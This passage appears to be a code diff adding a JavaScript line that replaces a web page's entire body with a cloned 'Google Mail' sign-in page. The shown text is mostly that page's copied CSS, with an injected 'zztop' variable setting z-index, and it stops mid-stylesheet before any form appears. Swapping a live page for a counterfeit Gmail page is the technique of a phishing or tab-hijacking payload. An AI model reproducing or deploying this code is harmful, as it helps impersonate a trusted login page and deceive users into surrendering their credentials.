+    document.body.innerHTML = "<!DOCTYPE html> <html lang='en'>   <head>   <meta charset='utf-8'>   <title>Google Mail: Email from Google</title>   <meta name='description' content='7+ GB of storage, less spam, and mobile access.  is email that&#39;s intuitive, efficient, and useful. And maybe even fun.'>   <link rel='icon' type='image/ico' href='//mail.google.com/favicon.ico'> <style type='text/css'>   html, body, div, h1, h2, h3, h4, h5, h6, p, img, dl,   dt, dd, ol, ul, li, table, tr, td, form, object, embed,   article, aside, canvas, command, details, fieldset,   figcaption, figure, footer, group, header, hgroup, legend,   mark, menu, meter, nav, output, progress, section, summary,   time, audio, video {   margin: 0;   padding: 0;   border: 0;   }   article, aside, details, figcaption, figure, footer,   header, hgroup, menu, nav, section {   display: block;   }   html {   font: 81.25% arial, helvetica, sans-serif;   background: #fff;   color: #333;   line-height: 1;   direction: ltr;   }   a {   color: #15c;   text-decoration: none;   }   a:active {   color: #d14836;   }   a:hover {   text-decoration: underline;   }   h1, h2, h3, h4, h5, h6 {   color: #222;   font-size: 1.54em;   font-weight: normal;   line-height: 24px;   margin: 0 0 .46em;   }   p {   line-height: 17px;   margin: 0 0 1em;   }   ol, ul {   list-style: none;   line-height: 17px;   margin: 0 0 1em;   }   li {   margin: 0 0 .5em;   }   table {   border-collapse: collapse;   border-spacing: 0;   }   strong {   color: #222;   } </style> <style type='text/css'>   html, body {   position: absolute;   height: 100%;   min-width: 100%;   }   .wrapper {   position: relative;   min-height: 100%;   }   .wrapper + style + iframe {   display: none;   }   .content {   padding: 0 44px;   }   .google-header-bar {   height: 71px;   background: #f1f1f1;   border-bottom: 1px solid #e5e5e5;   overflow: hidden;   }   .header .logo {   margin: 17px 0 0;   float: left;   }   .header .signin,   .header .signup {   margin: 28px 0 0;   float: right;   font-weight: bold;   }   .header .signin-button,   .header .signup-button {   margin: 22px 0 0;   float: right;   }   .header .signin-button a {   font-size: 13px;   font-weight: normal;   }   .header .signup-button a {   position: relative;   top: -1px;   margin: 0 0 0 1em;   }   .main {   margin: 0 auto;   width: 650px;   padding-top: 23px;   padding-bottom: 100px;   }   .main h1:first-child {   margin: 0 0 .92em;   }   .google-footer-bar {   position: absolute;   bottom: 0;   height: 35px;   width: 100%;   border-top: 1px solid #ebebeb;   overflow: hidden;   }   .footer {   padding-top: 9px;   font-size: .85em;   white-space: nowrap;   line-height: 0;   }   .footer ul {   color: #999;   float: left;   max-width: 80%;   }   .footer ul li {   display: inline;   padding: 0 1.5em 0 0;   }   .footer a {   color: #333;   }   .footer form {   text-align: right;   }   .footer form .lang-chooser {   max-width: 20%;   }   .redtext {   color: #dd4b39;   }   .greytext {   color: #555;   }   .secondary {   font-size: 11px;   color: #666;   }   .source {   color: #093;   }   .hidden {   display: none;   }   .announce-bar {   position: absolute;   bottom: 35px;   height: 33px;   z-index:"+zztop+" ;   width: 100%;   background: #f9edbe;   border-top: 1px solid #efe1ac;   border-bottom: 1px solid #efe1ac;   overflow: hidden;   }   .announce-bar .message {   font-size: .85em;   line-height: 33px;   margin: 0;   }   .announce-bar .message .separated {   margin-left: 1.5em;   }   .announce-bar-ac {   background: #eee;   border-top: 1px solid #e5e5e5;   border-bottom: 1px solid #e5e5e5;   }   .clearfix:after {   visibility: hidden;   display: block;   font-size: 0;   content: '.';   clear: both;   height: 0;   }   * html .clearfix {   zoom: 1;   }   *:first-child+html .clearfix {   zoom: 1;   } </style> <style type='text/css'>   button, input, select, textarea {   font-family: inherit;   font-size: inherit;   }   button::-moz-focus-inner,   input::-moz-focus-inner {   border: 0;   }   input[type=email],   input[type=number],   input[type=password],   input[type=tel],   input[type=text],   input[type=url] {   display: inline-block;   height: 29px;   margin: 0;   padding: 0 8px;   background: #fff;   border: 1px solid #d9d9d9;   border-top: 1px solid #c0c0c0;   -webkit-box-sizing: border-box;   -moz-box-sizing: border-box;   box-sizing: border-box;   -webkit-border-radius: 1px;   -moz-border-radius: 1px;   border-radius: 1px;   }   input[type=email]:hover,   input[type=number]:hover,   input[type=password]:hover,   input[type=tel]:hover,   input[type=text]:hover,   input[type=url]:hover {   border: 1px solid #b9b9b9;   border-top: 1px solid #a0a0a0;   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   }   input[type=email]:focus,   input[type=number]:focus,   input[type=password]:focus,   input[type=tel]:focus,   input[type=text]:focus,   input[type=url]:focus {   outline: none;   border: 1px solid #4d90fe;   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   }   input[type=email][disabled=disabled],   input[type=number][disabled=disabled],   input[type=password][disabled=disabled],   input[type=tel][disabled=disabled],   input[type=text][disabled=disabled],   input[type=url][disabled=disabled] {   border: 1px solid #e5e5e5;   background: #f1f1f1;   }   input[type=email][disabled=disabled]:hover,   input[type=number][disabled=disabled]:hover,   input[type=password][disabled=disabled]:hover,   input[type=tel][disabled=disabled]:hover,   input[type=text][disabled=disabled]:hover,   input[type=url][disabled=disabled]:hover {   -webkit-box-shadow: none;   -moz-box-shadow: none;   box-shadow: none;   }   input[type=email][readonly=readonly],   input[type=number][readonly=readonly],   input[type=password][readonly=readonly],   input[type=text][readonly=readonly],   input[type=url][readonly=readonly] {   border: 1px solid #d9d9d9;   }   input[type=email][readonly=readonly]:hover,   input[type=number][readonly=readonly]:hover,   input[type=password][readonly=readonly]:hover,   input[type=text][readonly=readonly]:hover,   input[type=url][readonly=readonly]:hover,   input[type=email][readonly=readonly]:focus,   input[type=number][readonly=readonly]:focus,   input[type=password][readonly=readonly]:focus,   input[type=text][readonly=readonly]:focus,   input[type=url][readonly=readonly]:focus {   -webkit-box-shadow: none;   -moz-box-shadow: none;   box-shadow: none;   }   input[type=checkbox].form-error,   input[type=email].form-error,   input[type=number].form-error,   input[type=password].form-error,   input[type=text].form-error,   input[type=url].form-error {   border: 1px solid #dd4b39;   }   input[type=checkbox],   input[type=radio] {   -webkit-appearance: none;   appearance: none;   width: 13px;   height: 13px;   margin: 0;   cursor: pointer;   vertical-align: bottom;   background: #fff;   border: 1px solid #dcdcdc;   -webkit-border-radius: 1px;   -moz-border-radius: 1px;   border-radius: 1px;   -webkit-box-sizing: border-box;   -moz-box-sizing: border-box;   box-sizing: border-box;   position: relative;   }   input[type=checkbox]:active,   input[type=radio]:active {   border-color: #c6c6c6;   background: #ebebeb;   }   input[type=checkbox]:hover {   border-color: #c6c6c6;   -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 1px rgba(0,0,0,0.1);   }   input[type=radio] {   -webkit-border-radius: 1em;   -moz-border-radius: 1em;   border-radius: 1em;   width: 15px;   height: 15px;   }   input[type=checkbox]:checked,   input[type=radio]:checked {   background: #fff;   }   input[type=radio]:checked::after {   content: '';   display: block;   position: relative;   top: 3px;   left: 3px;   width: 7px;   height: 7px;   background: #666;   -webkit-border-radius: 1em;   -moz-border-radius: 1em;   border-radius: 1em;   }   input[type=checkbox]:checked::after {   content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);   display: block;   position: absolute;   top: -6px;   left: -5px;   }   input[type=checkbox]:focus {   outline: none;   border-color:#4d90fe;   }   .g-button {   display: inline-block;   min-width: 46px;   text-align: center;   color: #444;   font-size: 11px;   font-weight: bold;   height: 27px;   padding: 0 8px;   line-height: 27px;   -webkit-border-radius: 2px;   -moz-border-radius: 2px;   border-radius: 2px;   -webkit-transition: all 0.218s;   -moz-transition: all 0.218s;   -ms-transition: all 0.218s;   -o-transition: all 0.218s;   transition: all 0.218s;   border: 1px solid #dcdcdc;   background-color: #f5f5f5;   background-image: -webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#f1f1f1));   background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: linear-gradient(top,#f5f5f5,#f1f1f1);   -webkit-user-select: none;   -moz-user-select: none;   user-select: none;   cursor: default;   }   *+html .g-button {   min-width: 70px;   }   button.g-button,   input[type=submit].g-button {   height: 29px;   line-height: 29px;   vertical-align: bottom;   margin: 0;   }   *+html button.g-button,   *+html input[type=submit].g-button {   overflow: visible;   }   .g-button:hover {   border: 1px solid #c6c6c6;   color: #333;   text-decoration: none;   -webkit-transition: all 0.0s;   -moz-transition: all 0.0s;   -ms-transition: all 0.0s;   -o-transition: all 0.0s;   transition: all 0.0s;   background-color: #f8f8f8;   background-image: -webkit-gradient(linear,left top,left bottom,from(#f8f8f8),to(#f1f1f1));   background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: linear-gradient(top,#f8f8f8,#f1f1f1);   -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);   -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);   box-shadow: 0 1px 1px rgba(0,0,0,0.1);   }   .g-button:active {   background-color: #f6f6f6;   background-image: -webkit-gradient(linear,left top,left bottom,from(#f6f6f6),to(#f1f1f1));   background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);   background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);   background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);   background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);   background-image: linear-gradient(top,#f6f6f6,#f1f1f1);   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   }   .g-button:visited {   color: #666;   }   .g-button-submit {   border: 1px solid #3079ed;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.1);   background-color: #4d90fe;   background-image: -webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#4787ed));   background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);   background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);   background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);   background-image: -o-linear-gradient(top,#4d90fe,#4787ed);   background-image: linear-gradient(top,#4d90fe,#4787ed);   }   .g-button-submit:hover {   border: 1px solid #2f5bb7;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.3);   background-color: #357ae8;   background-image: -webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#357ae8));   background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);   background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);   background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);   background-image: -o-linear-gradient(top,#4d90fe,#357ae8);   background-image: linear-gradient(top,#4d90fe,#357ae8);   }   .g-button-submit:active {   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   }   .g-button-share {   border: 1px solid #29691d;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.1);   background-color: #3d9400;   background-image: -webkit-gradient(linear,left top,left bottom,from(#3d9400),to(#398a00));   background-image: -webkit-linear-gradient(top,#3d9400,#398a00);   background-image: -moz-linear-gradient(top,#3d9400,#398a00);   background-image: -ms-linear-gradient(top,#3d9400,#398a00);   background-image: -o-linear-gradient(top,#3d9400,#398a00);   background-image: linear-gradient(top,#3d9400,#398a00);   }   .g-button-share:hover {   border: 1px solid #2d6200;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.3);   background-color: #368200;   background-image: -webkit-gradient(linear,left top,left bottom,from(#3d9400),to(#368200));   background-image: -webkit-linear-gradient(top,#3d9400,#368200);   background-image: -moz-linear-gradient(top,#3d9400,#368200);   background-image: -ms-linear-gradient(top,#3d9400,#368200);   background-image: -o-linear-gradient(top,#3d9400,#368200);   background-image: linear-gradient(top,#3d9400,#368200);   }   .g-button-share:active {   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   }   .g-button-red {   border: 1px solid transparent;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.1);   text-transform: uppercase;   background-color: #d14836;   background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#d14836));   background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);   background-image: -moz-linear-gradient(top,#dd4b39,#d14836);   background-image: -ms-linear-gradient(top,#dd4b39,#d14836);   background-image: -o-linear-gradient(top,#dd4b39,#d14836);   background-image: linear-gradient(top,#dd4b39,#d14836);   }   .g-button-red:hover {   border: 1px solid #b0281a;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.3);   background-color: #c53727;   background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#c53727));   background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);   background-image: -moz-linear-gradient(top,#dd4b39,#c53727);   background-image: -ms-linear-gradient(top,#dd4b39,#c53727);   background-image: -o-linear-gradient(top,#dd4b39,#c53727);   background-image: linear-gradient(top,#dd4b39,#c53727);   -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.2);   -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.2);   -ms-box-shadow: 0 1px 1px rgba(0,0,0,0.2);   -o-box-shadow: 0 1px 1px rgba(0,0,0,0.2);   box-shadow: 0 1px 1px rgba(0,0,0,0.2);   }   .g-button-red:active {   border: 1px solid #992a1b;   background-color: #b0281a;   background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#b0281a));   background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);   background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);   background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);   background-image: -o-linear-gradient(top,#dd4b39,#b0281a);   background-image: linear-gradient(top,#dd4b39,#b0281a);   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   }   .g-button-white {   border: 1px solid #dcdcdc;   color: #666;   background: #fff;   }   .g-button-white:hover {   border: 1px solid #c6c6c6;   color: #333;   background: #fff;   -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);   -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);   box-shadow: 0 1px 1px rgba(0,0,0,0.1);   }   .g-button-white:active {   background: #fff;   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   }   .g-button-red:visited,   .g-button-share:visited,   .g-button-submit:visited {   color: #fff;   }   .g-button-submit:focus,   .g-button-share:focus,   .g-button-red:focus {   -webkit-box-shadow: inset 0 0 0 1px #fff;   -moz-box-shadow: inset 0 0 0 1px #fff;   box-shadow: inset 0 0 0 1px #fff;   }   .g-button-share:focus {   border-color: #29691d;   }   .g-button-red:focus {   border-color: #d14836;   }   .g-button-submit:focus:hover,   .g-button-share:focus:hover,   .g-button-red:focus:hover {   -webkit-box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1);   box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1);   }   .g-button.selected {   background-color: #eee;   background-image: -webkit-gradient(linear,left top,left bottom,from(#eee),to(#e0e0e0));   background-image: -webkit-linear-gradient(top,#eee,#e0e0e0);   background-image: -moz-linear-gradient(top,#eee,#e0e0e0);   background-image: -ms-linear-gradient(top,#eee,#e0e0e0);   background-image: -o-linear-gradient(top,#eee,#e0e0e0);   background-image: linear-gradient(top,#eee,#e0e0e0);   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   border: 1px solid #ccc;   color: #333;   }   .g-button img {   display: inline-block;   margin: -3px 0 0;   opacity: .55;   filter: alpha(opacity=55);   vertical-align: middle;   pointer-events: none;   }   *+html .g-button img {   margin: 4px 0 0;   }   .g-button:hover img {   opacity: .72;   filter: alpha(opacity=72);   }   .g-button:active img {   opacity: 1;   filter: alpha(opacity=100);   }   .g-button.disabled img {   opacity: .5;   filter: alpha(opacity=50);   }   .g-button.disabled,   .g-button.disabled:hover,   .g-button.disabled:active,   .g-button-submit.disabled,   .g-button-submit.disabled:hover,   .g-button-submit.disabled:active,   .g-button-share.disabled,   .g-button-share.disabled:hover,   .g-button-share.disabled:active,   .g-button-red.disabled,   .g-button-red.disabled:hover,   .g-button-red.disabled:active,   input[type=submit][disabled=disabled].g-button {   background-color: none;   opacity: .5;   filter: alpha(opacity=50);   cursor: default;   pointer-events: none;   }   .goog-menu {   -webkit-box-shadow: 0 2px 4px rgba(0,0,0,0.2);   -moz-box-shadow: 0 2px 4px rgba(0,0,0,0.2);   box-shadow: 0 2px 4px rgba(0,0,0,0.2);   -webkit-transition: opacity 0.218s;   -moz-transition: opacity 0.218s;   -ms-transition: opacity 0.218s;   -o-transition: opacity 0.218s;   transition: opacity 0.218s;   background: #fff;   border: 1px solid #ccc;   border: 1px solid rgba(0,0,0,.2);   cursor: default;   font-size: 13px;   margin: 0;   outline: none;   padding: 0 0 6px;   position: absolute;   z-index: "+zztop+";   overflow: auto;   }   .goog-menuitem,   .goog-tristatemenuitem,   .goog-filterobsmenuitem {   position: relative;   color: #333;   cursor: pointer;   list-style: none;   margin: 0;   padding: 6px 7em 6px 30px;   white-space: nowrap;   }   .goog-menuitem-highlight,   .goog-menuitem-hover {   background-color: #eee;   border-color: #eee;   border-style: dotted;   border-width: 1px 0;   padding-top: 5px;   padding-bottom: 5px;   }   .goog-menuitem-highlight .goog-menuitem-content,   .goog-menuitem-hover .goog-menuitem-content {   color: #333;   }   .goog-menuseparator {   border-top: 1px solid #ebebeb;   margin-top: 9px;   margin-bottom: 10px;   }   .goog-inline-block {   position: relative;   display: -moz-inline-box;   display: inline-block;   }   * html .goog-inline-block {   display: inline;   }   *:first-child+html .goog-inline-block {   display: inline;   }   .dropdown-block {   display: block;   }   .goog-flat-menu-button {   -webkit-border-radius: 2px;   -moz-border-radius: 2px;   border-radius: 2px;   background-color: #f5f5f5;   background-image: -webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#f1f1f1));   background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: linear-gradient(top,#f5f5f5,#f1f1f1);   border: 1px solid #dcdcdc;   color: #444;   font-size: 11px;   font-weight: bold;   line-height: 27px;   list-style: none;   margin: 0 2px;   min-width: 46px;   outline: none;   padding: 0 18px 0 6px;   text-decoration: none;   vertical-align: middle;   }   .goog-flat-menu-button-disabled {   background-color: #fff;   border-color: #f3f3f3;   color: #b8b8b8;   cursor: default;   }   .goog-flat-menu-button.goog-flat-menu-button-hover {   background-color: #f8f8f8;   background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: linear-gradient(top,#f8f8f8,#f1f1f1);   -webkit-box-shadow: 0 1px 1px rgba(0,0,0,.1);   -moz-box-shadow: 0 1px 1px rgba(0,0,0,.1);   box-shadow: 0 1px 1px rgba(0,0,0,.1);   border-color: #c6c6c6;   color: #333;   }   .goog-flat-menu-button.goog-flat-menu-button-focused {   border-color: #4d90fe;   }   .form-error .goog-flat-menu-button {   border: 1px solid #dd4b39;   }   .form-error .goog-flat-menu-button-focused {   border-color: #4d90fe;   }   .goog-flat-menu-button.goog-flat-menu-button-open,   .goog-flat-menu-button.goog-flat-menu-button-active {   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,.1);   background-color: #eee;   background-image: -webkit-linear-gradient(top,#eee,#e0e0e0);   background-image: -moz-linear-gradient(top,#eee,#e0e0e0);   background-image: -ms-linear-gradient(top,#eee,#e0e0e0);   background-image: -o-linear-gradient(top,#eee,#e0e0e0);   background-image: linear-gradient(top,#eee,#e0e0e0);   border: 1px solid #ccc;   color: #333;   z-index: "+zztop+";   }   .goog-flat-menu-button-caption {   vertical-align: top;   white-space: nowrap;   }   .goog-flat-menu-button-dropdown {   border-color: #777 transparent;   border-style: solid;   border-width: 4px 4px 0;   height: 0;   width: 0;   position: absolute;   right: 5px;   top: 12px;   }   .jfk-select .goog-flat-menu-button-dropdown {   background: url(//ssl.gstatic.com/ui/v1/disclosure/grey-disclosure-arrow-up-down.png) center no-repeat;   border: none;   height: 11px;   margin-top: -4px;   width: 7px;   }   .goog-menu-nocheckbox .goog-menuitem,   .goog-menu-noicon .goog-menuitem {   padding-left: 16px;   vertical-align: middle;   }   body ::-webkit-scrollbar {   height: 16px;   width: 16px;   overflow: visible;   }   body ::-webkit-scrollbar-button {   height: 0;   width: 0;   }   body ::-webkit-scrollbar-track {   background-clip: padding-box;   border: solid transparent;   border-width: 0 0 0 7px;   }   body ::-webkit-scrollbar-track:horizontal {   border-width: 7px 0 0;   }   body ::-webkit-scrollbar-track:hover {   background-color: rgba(0,0,0,.05);   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.1);   box-shadow: inset 1px 0 0 rgba(0,0,0,.1);   }   body ::-webkit-scrollbar-track:horizontal:hover {   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.1);   box-shadow: inset 0 1px 0 rgba(0,0,0,.1);   }   body ::-webkit-scrollbar-track:active {   background-color: rgba(0,0,0,.05);   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   }   body ::-webkit-scrollbar-track:horizontal:active {   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar-dark::-webkit-scrollbar-track:hover {   background-color: rgba(255,255,255,.1);   -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.2);   box-shadow: inset 1px 0 0 rgba(255,255,255,.2);   }   .jfk-scrollbar-dark::-webkit-scrollbar-track:horizontal:hover {   -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2);   box-shadow: inset 0 1px 0 rgba(255,255,255,.2);   }   .jfk-scrollbar-dark::-webkit-scrollbar-track:active {   background-color: rgba(255,255,255,.1);   -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15);   box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15);   }   .jfk-scrollbar-dark::-webkit-scrollbar-track:horizontal:active {   -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15);   box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15);   }   body ::-webkit-scrollbar-thumb {   background-color: rgba(0,0,0,.2);   background-clip: padding-box;   border: solid transparent;   border-width: 0 0 0 7px;   min-height: 28px;   padding: 100px 0 0;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);   }   body ::-webkit-scrollbar-thumb:horizontal {   border-width: 7px 0 0;   padding: 0 0 0 100px;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07);   }   body ::-webkit-scrollbar-thumb:hover {   background-color: rgba(0,0,0,.4);   -webkit-box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);   box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);   }   body ::-webkit-scrollbar-thumb:active {   background-color: rgba(0,0,0,.5);   -webkit-box-shadow: inset 1px 1px 3px rgba(0,0,0,.35);   box-shadow: inset 1px 1px 3px rgba(0,0,0,.35);   }   .jfk-scrollbar-dark::-webkit-scrollbar-thumb {   background-color: rgba(255,255,255,.3);   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1);   }   .jfk-scrollbar-dark::-webkit-scrollbar-thumb:horizontal {   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1);   }   .jfk-scrollbar-dark::-webkit-scrollbar-thumb:hover {   background-color: rgba(255,255,255,.6);   -webkit-box-shadow: inset 1px 1px 1px rgba(255,255,255,.37);   box-shadow: inset 1px 1px 1px rgba(255,255,255,.37);   }   .jfk-scrollbar-dark::-webkit-scrollbar-thumb:active {   background-color: rgba(255,255,255,.75);   -webkit-box-shadow: inset 1px 1px 3px rgba(255,255,255,.5);   box-shadow: inset 1px 1px 3px rgba(255,255,255,.5);   }   .jfk-scrollbar-borderless::-webkit-scrollbar-track {   border-width: 0 1px 0 6px   }   .jfk-scrollbar-borderless::-webkit-scrollbar-track:horizontal {   border-width: 6px 0 1px   }   .jfk-scrollbar-borderless::-webkit-scrollbar-track:hover {   background-color: rgba(0,0,0,.035);   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar-borderless.jfk-scrollbar-dark::-webkit-scrollbar-track:hover {   background-color: rgba(255,255,255,.07);   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15);   }   .jfk-scrollbar-borderless::-webkit-scrollbar-thumb {   border-width: 0 1px 0 6px;   }   .jfk-scrollbar-borderless::-webkit-scrollbar-thumb:horizontal {   border-width: 6px 0 1px;   }   body ::-webkit-scrollbar-corner {   background: transparent;   }   body::-webkit-scrollbar-track-piece {   background-clip: padding-box;   background-color: #f1f1f1;   border: solid #fff;   border-width: 0 0 0 3px;   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   }   body::-webkit-scrollbar-track-piece:horizontal {   border-width: 3px 0 0;   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   }   body::-webkit-scrollbar-thumb {   border-width: 1px 1px 1px 5px;   }   body::-webkit-scrollbar-thumb:horizontal {   border-width: 5px 1px 1px;   }   body::-webkit-scrollbar-corner {   background-clip: padding-box;   background-color: #f1f1f1;   border: solid #fff;   border-width: 3px 0 0 3px;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);   }   .jfk-scrollbar::-webkit-scrollbar {   height: 16px;   overflow: visible;   width: 16px;   }   .jfk-scrollbar::-webkit-scrollbar-button {   height: 0;   width: 0;   }   .jfk-scrollbar::-webkit-scrollbar-track {   background-clip: padding-box;   border: solid transparent;   border-width: 0 0 0 7px;   }   .jfk-scrollbar::-webkit-scrollbar-track:horizontal {   border-width: 7px 0 0;   }   .jfk-scrollbar::-webkit-scrollbar-track:hover {   background-color: rgba(0,0,0,.05);   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.1);   box-shadow: inset 1px 0 0 rgba(0,0,0,.1);   }   .jfk-scrollbar::-webkit-scrollbar-track:horizontal:hover {   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.1);   box-shadow: inset 0 1px 0 rgba(0,0,0,.1);   }   .jfk-scrollbar::-webkit-scrollbar-track:active {   background-color: rgba(0,0,0,.05);   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 0 0 